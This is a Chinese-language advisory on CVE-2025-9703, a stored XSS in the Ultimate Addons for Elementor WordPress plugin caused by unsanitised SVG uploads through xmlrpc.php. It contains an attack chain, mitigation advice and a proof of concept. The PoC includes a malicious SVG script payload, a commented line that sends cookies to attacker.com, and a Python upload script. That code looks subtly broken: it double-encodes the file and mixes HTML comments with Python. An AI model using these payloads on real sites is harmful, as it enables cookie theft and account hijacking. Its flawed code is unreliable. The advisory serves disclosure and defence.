CVE-2025-9703 Ultimate Addons for Elementor插件XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9703

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) WordPress插件

漏洞概述

CVE-2025-9703是Ultimate Addons for Elementor（曾用名Elementor Header & Footer Builder）WordPress插件中存在的一个跨站脚本（XSS）安全漏洞。该插件在2.5.0版本之前，未对通过xmlrpc.php端点使用base64编码上传的SVG文件内容进行充分的清理和过滤。SVG（Scalable Vector Graphics）作为一种基于XML的矢量图形格式，支持嵌入JavaScript脚本和事件处理器，这使得恶意攻击者可以利用未净化的SVG文件内容注入并执行恶意脚本代码。该漏洞由WPScan团队（[email protected]）发现并报告，CVSS 3.1评分为4.3分，属于中等严重等级。虽然该漏洞的攻击复杂度较低且需要网络访问，但利用条件要求攻击者具备高权限（PR:H），并且需要目标用户进行一定的交互（UI:R），因此整体风险评级为中等。该漏洞可能导致存储型XSS攻击，攻击者可以在受害者的浏览器上下文中执行任意JavaScript代码，窃取会话cookie、篡改页面内容或执行其他恶意操作。WordPress生态系统中此类插件漏洞较为常见，因为SVG文件的处理涉及XML解析和内容渲染，需要特别关注安全过滤。

技术细节

该漏洞的核心技术问题在于Ultimate Addons for Elementor插件在处理通过WordPress xmlrpc.php端点上传的SVG文件时，未对SVG文件内容进行有效的安全清理。xmlrpc.php是WordPress提供的XML-RPC协议接口，允许通过HTTP协议进行远程过程调用，包括文件上传等操作。攻击者首先需要将恶意的SVG文件内容进行base64编码，然后通过xmlrpc.php端点上传。SVG格式本身支持内嵌JavaScript代码，例如通过<script>标签或事件处理器属性（如onload、onmouseover等）来执行脚本。当插件接收并存储该SVG文件后，由于缺乏对SVG内容的清理（如使用DOMPurify等库进行过滤），恶意脚本得以保留。当其他用户访问包含该SVG文件的页面时，浏览器会解析SVG并执行其中的恶意JavaScript代码，从而触发XSS攻击。攻击者可以利用此漏洞窃取用户会话、执行未授权操作、钓鱼攻击或传播恶意软件。由于该漏洞需要高权限（PR:H）才能触发，这表明攻击者需要先获取WordPress站点的编辑或管理员权限才能利用xmlrpc.php上传功能。但一旦具备相应权限，即可轻松植入恶意SVG文件，影响访问站点的其他用户。

攻击链分析

STEP 1

步骤1：获取权限

攻击者需要先获取目标WordPress站点的高权限账户（如编辑或管理员），这可能通过暴力破解、凭据泄露或社会工程学实现。

STEP 2

步骤2：构造恶意SVG文件

攻击者创建一个包含恶意JavaScript代码的SVG文件，通过<script>标签或事件处理器（如onload）嵌入XSS payload。

STEP 3

步骤3：Base64编码并上传

将恶意SVG文件内容进行base64编码，然后通过WordPress的xmlrpc.php端点使用wp.uploadFile方法上传至目标服务器。

STEP 4

步骤4：触发XSS执行

当其他用户访问包含该恶意SVG文件的页面时，浏览器解析SVG并执行其中的JavaScript代码，触发跨站脚本攻击。

STEP 5

步骤5：实施恶意行为

攻击者利用执行的JavaScript窃取用户会话cookie、进行钓鱼攻击、劫持账户或执行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-9703 PoC: XSS via Unsanitized SVG Upload through xmlrpc.php -->
<!-- Step 1: Create malicious SVG file with embedded JavaScript -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <script type="text/javascript">
    // Malicious JavaScript payload
    alert('XSS via SVG - CVE-2025-9703');
    // In real attack: steal cookies, redirect users, etc.
    // document.location='http://attacker.com/steal?cookie='+document.cookie;
  </script>
  <!-- Alternative: use event handlers -->
  <circle cx="50" cy="50" r="40" fill="red" onload="alert('XSS via onload event')"/>
</svg>

<!-- Step 2: Base64 encode the SVG content -->
<!-- Use: base64 malicious.svg > encoded.txt -->

<!-- Step 3: Upload via xmlrpc.php using authenticated session -->
<!-- Python PoC for uploading via xmlrpc.php -->
import xmlrpc.client
import base64

# Read malicious SVG content
with open('malicious.svg', 'rb') as f:
    svg_content = f.read()

# Base64 encode the content
encoded_svg = base64.b64encode(svg_content).decode('utf-8')

# Connect to WordPress xmlrpc.php
url = 'http://target-wordpress-site.com/xmlrpc.php'
proxy = xmlrpc.client.ServerProxy(url)

# Upload using wp.uploadFile method (requires authentication)
# Note: Attacker needs valid credentials with appropriate privileges
result = proxy.wp.uploadFile(
    1,  # blog_id
    'admin',  # username
    'password',  # password
    {
        'name': 'malicious.svg',
        'type': 'image/svg+xml',
        'bits': xmlrpc.client.Binary(encoded_svg),
        'overwrite': True
    }
)
print(f"Upload result: {result}")

<!-- Step 4: Trigger XSS by visiting the page containing the uploaded SVG -->
<!-- When a victim visits the page, the malicious script executes -->

影响范围

Ultimate Addons for Elementor < 2.5.0

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过.htaccess或Nginx配置禁用xmlrpc.php的访问，或仅允许特定IP地址访问；2）在WordPress中安装安全插件，限制SVG文件的上传功能；3）通过functions.php添加代码过滤SVG文件中的<script>标签和事件处理器属性；4）加强WordPress账户安全管理，强制使用强密码并启用双因素认证，减少高权限账户被攻破的风险；5）部署Web应用防火墙规则，检测和阻止包含可疑内容的SVG文件上传请求。